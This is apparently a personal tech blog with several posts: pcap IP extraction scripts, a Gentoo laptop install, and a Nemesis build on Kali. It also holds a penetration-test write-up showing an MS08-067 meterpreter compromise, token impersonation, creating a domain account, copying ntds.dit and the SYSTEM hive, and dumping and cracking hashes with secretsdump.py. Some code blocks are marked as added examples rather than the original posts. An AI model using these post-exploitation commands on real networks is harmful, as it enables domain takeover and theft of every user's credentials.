Tuesday, November 18, 2014

extracting-public-ip-from-pcap

Came across a situation that required extracting all public IP addresses from a huge traffic capture file.

The following method was adopted to manage the task and save time.

File name: extracted-traffic.pcapng

tcpdump -n -r extracted-traffic.pcapng | awk '{print $3}' | awk -F"." '{print $1"."$2"."$3"."$4}' | sort | uniq  > ip-extracted

Used the following Python script to extract the public IPs from ip-extracted (the second awk above strips tcpdump's trailing .port from each source address, so each line of ip-extracted is one dotted quad):

#!/usr/bin/env python
from IPy import IP

# Keep only globally routable ("PUBLIC") addresses from the tcpdump-derived list.
f = open('public-ip-list.txt', 'w')
with open('ip-extracted') as fp:
    for line in fp:
        line = line.strip()
        if not line:
            continue
        try:
            ip = IP(line)
        except ValueError:
            continue  # column was not an IPv4 address (ARP, IP6 and similar lines)
        if ip.iptype() == "PUBLIC":
            f.write(line + '\n')
f.close()

Final IP list: public-ip-list.txt
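As an added example (not the post's own script), the same filtering done directly over tcpdump lines with the standard-library ipaddress module in place of IPy. It goes a little beyond the post: it skips ARP and IP6 lines (which the awk pipeline passes through), can include destination addresses as well, and checks routability explicitly so multicast, reserved and CGNAT ranges never count as public. The tcpdump lines are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample of `tcpdump -n -r <file>` output (not the page's capture).
SAMPLE_TCPDUMP = """\
12:00:01.000000 IP 192.168.1.10.49152 > 93.184.216.34.443: Flags [S], seq 1, win 64240, length 0
12:00:01.000100 IP 93.184.216.34.443 > 192.168.1.10.49152: Flags [S.], seq 2, ack 2, win 65535, length 0
12:00:02.000000 IP 10.0.0.5.53 > 192.168.1.10.51000: 1234 1/0/0 A 8.8.8.8 (44)
12:00:03.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.10, length 28
12:00:04.000000 IP 192.168.1.10 > 224.0.0.251: igmp v2 report 224.0.0.251
12:00:05.000000 IP6 fe80::1.546 > ff02::1:2.547: dhcp6 solicit
12:00:06.000000 IP 172.16.0.9.40000 > 1.1.1.1.53: 5678+ A? example.com. (29)
"""

# tcpdump prints IPv4 endpoints as a.b.c.d.port; the port suffix is optional.
ADDR_PORT = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3})(?:\.\d+)?$')
CGNAT = ipaddress.ip_network('100.64.0.0/10')

def host_of(token):
    """Return the IPv4 address part of a tcpdump endpoint token, or None."""
    m = ADDR_PORT.match(token.rstrip(':'))
    return m.group(1) if m else None

def is_public(addr):
    """Explicit routability check; accepts a string or an ipaddress object."""
    addr = ipaddress.ip_address(str(addr))
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified
                or addr in CGNAT)

def public_ips(tcpdump_text, both_ends=True):
    """Unique public IPv4 addresses from the source column (and destination if asked)."""
    found = set()
    for line in tcpdump_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[1] != 'IP':
            continue  # ARP, IP6 and other non-IPv4 lines carry no IPv4 endpoint
        tokens = [fields[2]] + ([fields[4]] if both_ends else [])
        for tok in tokens:
            host = host_of(tok)
            if host is None:
                continue
            try:
                addr = ipaddress.ip_address(host)
            except ValueError:
                continue  # dotted quad with an octet above 255
            if is_public(addr):
                found.add(addr)
    return [str(a) for a in sorted(found)]
```

Note that 8.8.8.8 in the DNS answer payload is not picked up, because only the two endpoint columns are inspected, exactly like the awk pipeline.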

Tuesday, November 11, 2014

Gentoo-Lenovo-ThinkpadT440p

At last ... I made it on ThinkPad T440p ....

Followed the same way -
Handbook
https://www.gentoo.org/doc/en/handbook/handbook-amd64.xml

X-Org
http://wiki.gentoo.org/wiki/Xorg/Configuration

LXDE
http://wiki.gentoo.org/wiki/LXDE

Audio
http://wiki.gentoo.org/wiki/PulseAudio
http://wiki.gentoo.org/wiki/ALSA

My running kernel is 3.16.5.
Tried 3.17.1, but vmware and vmplayer did not compile properly (needs some patch), so I went back to the 3.16.5 kernel.
VMware Workstation works super great...

lspci

00:00.0 Host bridge: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor DRAM Controller (rev 06)
00:02.0 VGA compatible controller: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller (rev 06)
00:03.0 Audio device: Intel Corporation Xeon E3-1200 v3/4th Gen Core Processor HD Audio Controller (rev 06)
00:14.0 USB controller: Intel Corporation 8 Series/C220 Series Chipset Family USB xHCI (rev 04)
00:16.0 Communication controller: Intel Corporation 8 Series/C220 Series Chipset Family MEI Controller #1 (rev 04)
00:19.0 Ethernet controller: Intel Corporation Ethernet Connection I217-LM (rev 04)
00:1b.0 Audio device: Intel Corporation 8 Series/C220 Series Chipset High Definition Audio Controller (rev 04)
00:1c.0 PCI bridge: Intel Corporation 8 Series/C220 Series Chipset Family PCI Express Root Port #1 (rev d4)
00:1c.1 PCI bridge: Intel Corporation 8 Series/C220 Series Chipset Family PCI Express Root Port #2 (rev d4)
00:1d.0 USB controller: Intel Corporation 8 Series/C220 Series Chipset Family USB EHCI #1 (rev 04)
00:1f.0 ISA bridge: Intel Corporation QM87 Express LPC Controller (rev 04)
00:1f.2 SATA controller: Intel Corporation 8 Series/C220 Series Chipset Family 6-port SATA Controller 1 [AHCI mode] (rev 04)
00:1f.3 SMBus: Intel Corporation 8 Series/C220 Series Chipset Family SMBus Controller (rev 04)
02:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. RTS5227 PCI Express Card Reader (rev 01)
03:00.0 Network controller: Intel Corporation Wireless 7260 (rev 6b)

lsusb

Bus 001 Device 002: ID 8087:8000 Intel Corp.
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 005: ID 138a:0017 Validity Sensors, Inc.
Bus 002 Device 004: ID 046d:c534 Logitech, Inc. Unifying Receiver
Bus 002 Device 003: ID 058f:9540 Alcor Micro Corp. AU9540 Smartcard Reader
Bus 002 Device 007: ID 04f2:b39a Chicony Electronics Co., Ltd
Bus 002 Device 006: ID 8087:07dc Intel Corp.
Bus 002 Device 002: ID 0bb4:0001 HTC (High Tech Computer Corp.)
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

Wednesday, October 29, 2014

Kali-nemesis-libnet

Installation of Nemesis on Kali Linux

Nemesis -> http://nemesis.sourceforge.net/

Dependencies
apt-get install libdnet-dev
apt-get install libpcap-dev

Libnet -> wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz

tar zxvf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a/
./configure 
make

To avoid an error, edit the Makefile before installing: the MAN_PREFIX path variable is incomplete, and without it "make install" fails like this:

./install-sh include/libnet/libnet-macros.h /usr/include/libnet
./install-sh include/libnet/libnet-asn1.h /usr/include/libnet
./install-sh include/libnet/libnet-ospf.h /usr/include/libnet
./install-sh doc/libnet.3
install:    no destination specified
make: *** [install] Error 1

Complete the entry in the Makefile:

MAN_PREFIX  =   /usr/share/doc/

Then

# make install

Friday, October 24, 2014

Enterprise-Security-A-Complete-Internal-Compromise

This post is about an internal vulnerability assessment and penetration test for an enterprise. Every time I do a similar project I think of writing a post about it for my own reference... At last, now is the time for the same....
Enterprise:-
Yes.. More than 1500 Users ...
More than 100 Servers...
Firewalls...
Routers ...
Proxy...
VOIP...
Bio...
IT...
I...

My favorite fingerprinting command for a Windows environment:
nmap -p445 --script=smb-os-discovery xxx.xxx.x.x/xx

Ran Nessus against the desktop IP range. Surprisingly, all of them showed as good, except for RDP MITM, SSL and SMB signing!

Continued Nessus against the server ranges at headquarters: same result!!

Continued Nessus against the servers at branch offices....

Except for one 2003 server, all others showed the same!!!

There comes God's last fingerprint. What is that critical red colour? Yes, it is the very old, widely exploited and demonstrated piece of bug for evergreen Microsoft: MS08-067!

No more explanation required here at all. Yes, there comes the first reverse meterpreter shell!

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
<DOMAIN_NAME REMOVED>\backupuser



meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
DOMAIN\\backupuser
meterpreter > getuid
Server username:
DOMAIN\\backupuser
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
DOMAIN\\backupuser

There comes a user from the domain. Next, created a user on the domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily the backupuser account had the privilege to create a user on the ADC and add it to the Domain Admins group, etc.

Connected to the primary domain controller with RDP!!
At the command prompt:
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
1: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXxxxx
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dit file from
C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\Windows\NTDS\

Created a copy of the SYSTEM hive from the registry:
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded that file too..

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used secretsdump.py to extract usernames and hashes:
#secretsdump.py -system pentest.system -ntds ntds.dit LOCAL

The resulting file had more than 3000 lines!!!
The crackstation password list recovered up to 50 passwords for half of the hashes, and 20% of the users were using the same password!
***Cracking the hashes is not allowed in all organizations, so make sure before cracking the passwords that this action is not forbidden by their policy.***
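The password-reuse figure above can be measured without cracking a single hash, which matters where the policy forbids cracking: NT hashes are unsalted, so accounts with the same NT hash have the same password, and the empty-password NT hash is a well-known constant. This is an added audit script, not part of the original post; the dump lines are constructed in secretsdump.py's domain\user:rid:lmhash:nthash::: format, and the names and hash values are placeholders.

```python
import re
from collections import defaultdict

# NT hash of the empty password: a well-known constant, not taken from the page's dump.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump.py's "domain\user:rid:lmhash:nthash:::" format.
# The hash values are made up for illustration; DOMAIN and the user names are placeholders.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DOMAIN\\alice:1105:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
DOMAIN\\bob:1106:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DOMAIN\\carol:1107:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
DOMAIN\\svc-backup:1108:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# account:rid:lmhash:nthash::: ; the "[*] ..." status lines do not match and are skipped.
LINE_RE = re.compile(r'^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::')

def parse_dump(text):
    """Yield (account, rid, nthash) for each credential line in a secretsdump output."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(4).lower()

def audit_reuse(text):
    """Group accounts by NT hash: a hash shared by several accounts is a shared password."""
    by_hash = defaultdict(list)
    for account, _rid, nthash in parse_dump(text):
        by_hash[nthash].append(account)
    shared = {h: users for h, users in by_hash.items() if len(users) > 1}
    empty = by_hash.get(EMPTY_NT_HASH, [])
    total = sum(len(users) for users in by_hash.values())
    reusing = sum(len(users) for users in shared.values())
    return {"total": total, "reusing": reusing, "shared": shared, "empty_password": empty}
```

The "shared" groups are the accounts to force a reset on, and reusing/total is the reuse percentage the post quotes, obtained with no password ever recovered.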